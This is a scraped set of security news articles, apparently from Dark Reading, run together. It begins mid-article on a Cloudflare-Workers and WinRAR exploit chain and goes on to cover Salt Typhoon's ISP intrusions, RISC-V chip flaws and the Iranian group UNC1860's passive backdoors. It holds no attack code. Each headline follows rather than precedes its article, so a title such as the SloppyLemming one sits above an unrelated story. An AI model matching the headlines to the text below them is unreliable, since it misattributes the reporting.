Another Worker was used to redirect to a Dropbox URL, where lay a RAR file designed to exploit CVE-2023-38831, a "high" severity, 7.8 out of 10 CVSS-rated issue in WinRAR versions prior to 6.23. The same vulnerability was recently used by a Russian threat group against Ukrainian citizens. At the end of this Dropbox-heavy exploit chain was a remote access tool (RAT) that engaged several more Workers.

"They use at least three, or four, or five different cloud tools," notes Blake Darché, head of Cloudforce One at Cloudflare. "Threat actors generally are trying to take advantage of companies by using different services from different companies, so \[victims\] can't coordinate what they're doing."

To make sense of attack chains that spread across so many platforms, he says, "You've got to have good control of your network, and implement zero-trust architectures so you understand what's going in and out of your network, through all the different peripheries: DNS traffic, email traffic, Web traffic, understanding it in totality. I think a lot of organizations really struggle in this area."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

'SloppyLemming' APT Abuses Cloudflare Service in Pakistan Attacks

The state-sponsored advanced persistent threat (APT) is going after high-value communications service provider networks in the US, potentially with a dual set of goals.

Source: BSIP SA via Alamy Stock Photo

A freshly discovered advanced persistent threat (APT) dubbed "Salt Typhoon" has reportedly infiltrated Internet service provider (ISP) networks in the US, looking to steal information and potentially set up a launchpad for disruptive attacks.

Citing "people familiar with the matter," the Wall Street Journal broke the news on Sept. 25 that the Chinese-sponsored state hackers have successfully targeted "a handful" of cable and broadband service providers during the campaign.

Other details are scant, but Salt Typhoon's efforts highlight China's priorities when it comes to geopolitical realities, researchers note.

**A Sprinkle of Espionage, A Dash of Pre-Positioning**

For instance, a position within the service provider network would offer valuable reconnaissance for how to further target high-value marks working for the federal government, law enforcement, manufacturers, military contractors, and Fortune 100 companies. 

"Obtaining access to ISPs would make it easier to survey those users of the ISPs for information on their location and what kinds of services are being accessed," says Sean McNee, vice president of research and data at DomainTools. "Bad actors could get information about the ISP's users, where they live and billing information, and what kind of access or usage they have, \[who they call, and\] text messages."

But the concern doesn't stop there. Given China's desire to control Taiwan and other assets in the region, there's very likely a military component to the campaign as well.

"Based on the recent history of Chinese-sponsored cyber campaigns and warnings from \[the Cybersecurity and Infrastructure Security Agency\] and FBI, China has escalated from surveillance-only goals toward installing an offensive capability to disrupt critical US civilian and military infrastructure," warns Sean Deuby, principal technologist at Semperis. "This could potentially range from 'blinking the lights' to dissuade US intervention to actively delaying or crippling a US response to Chinese activities."

There's precedent for that assessment. Microsoft outed Volt Typhoon in January and its alarming efforts to plant itself inside military bases, critical infrastructure assets, and telecom infrastructure — all with the goal of being able to cause outages, disrupt communications, and sow panic in the event of a kinetic conflict with the US in the South China Sea. Since then, China has denied the allegations, while the APT has been actively expanding its efforts despite its cover being blown.

**China's Recipe: Targeting Telecom, ISPs, Critical Infrastructure**

The development is the latest in a string of Chinese-sponsored efforts to subvert critical infrastructure in the US and destabilize Pacific Rim allies, many flagged by Microsoft using hurricane-related names.

For instance, a Chinese threat actor known as Flax Typhoon emerged a year ago, using legitimate tools and utilities built into the Windows operating system to carry out an extremely stealthy and persistent spy operation against entities in Taiwan. Last week, news emerged that the APT had built a 200,000-device Internet of Things (IoT) botnet in order to gain a foothold in government, military, and critical manufacturing targets in the US.

There's also the APT that Microsoft calls Brass Typhoon (aka APT41, Earth Baxia, and Wicked Panda) that recently attacked Taiwanese government agencies, Filipino and Japanese military, and energy companies in Vietnam, installing backdoors for cyberespionage purposes.  

On top of that, other China-linked groups have made a name for themselves in specifically targeting communications service providers, such as Mustang Panda, especially in Taiwan and other countries of interest.

"Chinese-backed threat actors have been conducting attacks against telcos for as long as I can remember," Semperis' Deuby says. "Historically, their goals are to create 'persistence' in the carrier. By that I mean they will infiltrate a target, gain a foothold, and then move laterally with the goal of maintaining persistence and extracting data from strategic targets as needed."

He adds that lurking and listening is a specialty: "While Chinese government actors were behind the infamous Operation Soft Cell campaign in 2019, where the threat actor stole call data records, they had infiltrated some of the telcos more than five years before being discovered."

**Communications Service Provider Defenses Need Seasoning**

The ongoing targeting of communications infrastructure should put carriers and service providers on notice to harden their defenses.

Aside from phishing and social engineering of employees, Terry Dunlap, chief security strategist at NetRise, notes that firmware and supply chain attacks using core network gear could both be attack avenues against ISPs.

"ISPs' blind spots are the firmware running their devices. Most firmware contains insecure or sloppy code that can be easily exploited, if discovered," he notes. "Another attack vector would be the supply chain. For example, if the Ethernet controller in a router or switch is supplied by a Chinese company, there are scenarios where malicious code or backdoors could be integrated into that Ethernet controller, providing an adversary easy access to that important piece of networking equipment."

In 2020, the World Economic Forum and its global partners developed a set of best practices for ISPs (PDF), including principles such as sharing threat intelligence between peers, working more closely with hardware manufacturers to increase minimum levels of security, and improving routing security, Deuby says.

Still, "as someone that's talked to many organizations about the well-understood security steps they should be taking versus their actual security posture, I'm sure plenty of gaps remain."

**About the Author**

Tara Seals has 20+ years of experience as a journalist, analyst and editor in the cybersecurity, communications and technology space. Prior to Dark Reading, Tara was Editor in Chief at Threatpost, and prior to that, the North American news lead for Infosecurity Magazine. She also spent 13 years working for Informa (formerly Virgo Publishing), as executive editor and editor-in-chief at publications focused on both the service provider and the enterprise arenas. A Texas native, she holds a B.A. from Columbia University, lives in Western Massachusetts with her family and is on a never-ending quest for good Mexican food in the Northeast.

China's 'Salt Typhoon' Cooks Up Cyberattacks on US ISPs

The RISC-V chip architecture is gaining popularity worldwide, but the fact that it is easy to modify the processor design means it is also easy to introduce hard-to-patch vulnerabilities in the chips.

Source: Science Photo Library via Alamy Stock Photo

An emerging chip architecture gaining traction in smartphones, automotive technologies, and other electronics may find adoption stymied by security concerns.

Using x86 and ARM processors for hardware development can get expensive because of royalties that have to be paid to the owners (Intel and Arm). RISC-V is an instruction set on which customers can personalize silicon chips to meet their needs, much like how Lego blocks are put together. RISC-V is open and free to license, so anyone can design, manufacture, and sell RISC-V chips and software.

RISC-V is drawing interest among companies in the auto, critical infrastructure, and industrial sectors. For example, NASA is creating chips based on RISC-V that it intends to use in its space programs. Omdia estimates RISC-V shipments could tally 17 billion processors in 2030, improving 50% every year starting in 2024.

"46% of those processors are expected to be found in industrial applications, although the biggest growth over the forecast period will come in the automotive segment," Omdia said.

**Vulnerabilities in Designs**

RISC-V's open-source ethos is its biggest advantage, but also a liability: bad actors could introduce backdoors in the chip designs. Vulnerabilities in RISC-V chips used in automotive technology or critical infrastructure could be disastrous.

At Black Hat USA in August, researchers disclosed Ghostwrite, which allows users to bypass memory protection and access privileged memory in a RISC-V chip design called Xuantie C910. The Xuantie C910, designed by T-Head, a subsidiary of China-based Alibaba Group, received a lot of publicity when it was launched three years ago. It was one of the earliest RISC-V processors with a vector extension, which helps CPUs run demanding applications that include AI.

The vulnerability is particularly concerning because it affects the chip's proprietary vector extension, which wasn't properly implemented, says Fabian Thomas, a researcher in the group at CISPA Helmholtz Center for Information Security that discovered GhostWrite. Chip makers can patch the C910 by disabling the vector extension, but it will still be difficult to implement.

"People bought it and built 64-core machines because of that, and now we have to tell them to disable it," Thomas says.

**Shared Designs, Hard to Patch**

The issue is not in the RISC-V architecture itself, but in a faulty silicon implementation. Chip designers are enthusiastic about sharing RISC-V designs, but this means that designs with vulnerabilities may potentially be replicated and used in various areas. Resulting devices could be vulnerable to attack, and may be difficult to patch with microcode updates.

"The digital transformation happening in these sectors means they're all connected now, creating potential to exploit across all these very safety-critical systems," says Margaret Schmitt, a hardware security consultant.

It's already difficult to fix hardware vulnerabilities with firmware updates. The open nature of this chip architecture means it will be difficult to fix them in the field. "The silicon vulnerability is worse because you can't really fix them in the field in many cases... if it connects to critical infrastructure, this could be seen forever," says Alex Matrosov, CEO at Binarly.io.

There are hundreds of RISC-V designs available on GitHub to pick up, but security teams need to consider the risks of winding up with malicious chip designs with backdoors. "This is similar to open-source software projects where people \[make\] changes, saying 'I'm making it better,' but it's actually a backdoor or malware," Schmitt says.

The concern is especially heightened as the RISC-V architecture has become a priority for Russia and China, which are investing heavily in the technology to build homegrown chips. China and Russia ramped up RISC-V adoption after the U.S. banned the export of advanced chips to these countries amid trade and political hostilities.

The U.S. government has already talked about limiting RISC-V access to China, though that may be hard to do as the architecture is open source.

"You're seeing a potential basis for China to use this, a potential for unintended or intentionally added weaknesses to be a serious concern," says Schmitt.

**Working With Security Partners**

Organizations working with RISC-V chips on a shoestring budget may make the decision to sacrifice security, says Mike Eftimakis, vice president of strategy and ecosystem at Codasip, a software company.

"To be able to find a bug, you have to have the infrastructure behind you. It's very expensive and requires specialized knowledge, so it naturally shrinks the base of people who could potentially help with the verification of these devices," Eftimakis says.

Hardware security experts recommended going to established RISC-V companies with solid security processes, a strong customer base, and a good track record of designing chips. One example is Santa Clara, Calif.-based SiFive, which handles security analysis and rigorous compliance testing in its cores. The company has a large customer base that includes Google and NASA, a spokesman said in an email.

Another RISC-V company, Cupertino, Calif-based Ventana Micro Systems, uses the Caliptra specification to put security features directly in computing chips. Caliptra was developed by the Open Compute Project, a coalition which includes Google, Microsoft, AMD, and Nvidia.

Ventana Micro leaders have extensive experience working with x86 and ARM architectures, and are using that experience to secure RISC-V chips. "We applied these learnings during our ground-up development and have many patented features targeted at making our microarchitecture resilient to attacks," a company spokesperson said in an email.

**About the Author**

Agam Shah has covered enterprise IT for more than a decade. Outside of machine learning, hardware, and chips, he's also interested in martial arts and Russia.

Security Concerns Plague Emerging Chip Architecture

The group has used more than 30 custom tools to target high-value government and telecommunications organizations on behalf of Iranian intelligence services, researchers say.

Source: Christophe Coat via Alamy Stock Photo

An advanced persistent threat (APT) tied to Iran's Ministry of Intelligence and Security (MOIS) is providing initial access services to a bevy of Iranian state hacking groups.

UNC1860 has been the gateway for attacks by notorious groups like Scarred Manticore and OilRig (aka APT34, Helix Kitten, Cobalt Gypsym, Lyceum, Crambus, or Siamesekitten). As Mandiant explained in a recent blog post, its focus is exclusively on breaching and establishing a foothold in potentially valuable networks across high-value sectors — government, media, academia, critical infrastructure, and particularly telecommunications — then handing over access to other Iranian nation-state actors.

Over the years, UNC1860 has teamed up for attacks against targets in Iraq, Saudi Arabia, and Qatar; aided in espionage of Mideast telecommunications companies; prepared the ground for wiper attacks in Albania and Israel; and more.

**UNC1860's Many Backdoors**

In March, Israel's National Cyber Directorate warned that wiper attacks were striking organizations across the country, including managed service providers, local governments, and academic institutions. Among the indicators of compromise (IoCs) were a Web shell called "Stayshante" and a dropper called "Sasheyaway," just two of around 30 custom malware tools managed by UNC1860, the Mandiant report explained.

UNC1860 isn't the one doing the wiping, or any other disruptive, destructive, or otherwise exploitative behavior in a target's network. Its job is merely to gain that initial foothold, primarily by scanning for vulnerabilities in public-facing assets at targeted organizations, then dropping a series of increasingly serious and sophisticated backdoors. 

Stayshante, Sasheyaway, and tools like it provide its first toe in the water, and can be used to download more substantial backdoors like "Templedoor," "Faceface," and "Sparkload." For its highest-value targets, UNC1860 will deploy its most sophisticated, main-stage backdoors like "Templedrop," or "Oatboat," which loads and executes payloads such as "Tofupipe" and "Tofuload," TCP-based passive listeners.

"To set up those listeners, they are not even leveraging regular Windows API calls — they actually leverage some undocumented tools of HTTP.sys, which is crazy," says Stav Shulman, senior researcher with Mandiant by Google Cloud.

"Most backdoors would leverage common API calling, so most engines would detect them," Shulman explains. "But if you are determined enough, and clever enough, and if you have extraordinary technical knowledge, you can leverage calls that are not documented by the Microsoft Developer Network (MSDN). So UNC1860 actually reverse engineered them themselves, so that you won't detect their calls."

**UNC1860's Trick to Staying Undetected**

Besides its lack of destructive behavior, there's another reason why you hear about Scarred Manticore, Oil Rig, and Shrouded Snooper, but rarely UNC1860: All of UNC1860s implants are entirely passive. It doesn't send any information out from target networks, and doesn't need to maintain any kind of command-and-control (C2) infrastructure.

"Most detections today are very focused on outbound communications, but UNC1860 just focuses on inbound requests," Shulman says. "That inbound traffic they listen to can come from any number of stealthy sources \[including\] VPN nodes in proximity to the target, other victims of prior attacks, and other locations in a target's network."

In 2020, for example, the group was observed using one of its victims' networks as a launch point to scan for potentially vulnerable IP addresses in Saudi Arabia, vet various accounts and email addresses associated with domains in Saudi Arabia in Qatar, and target VPN servers in the same region.

And, as Shulman notes, "To escalate the operation, they only need to send one command at any random point in time to activate the backdoor." Because the group's implants utilize HTTPS-encrypted traffic, victims will not be able to decrypt its commands or payloads.

Shulman advises organizations to focus on how best to vet incoming network traffic.

"How do we detect \[malicious traffic\]? How do we decide if incoming traffic is malicious or not?" Shulman says. "Because even \[when UNC1860 is abusing\] documented API calls that cybersecurity engines would catch, there's plenty of legitimate software that use these same calls, so detecting malicious calls could be very confusing and have lots of false positives. Focusing on the incoming traffic is the key, I think, for detecting UNC1860's activity."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Tag

#backdoor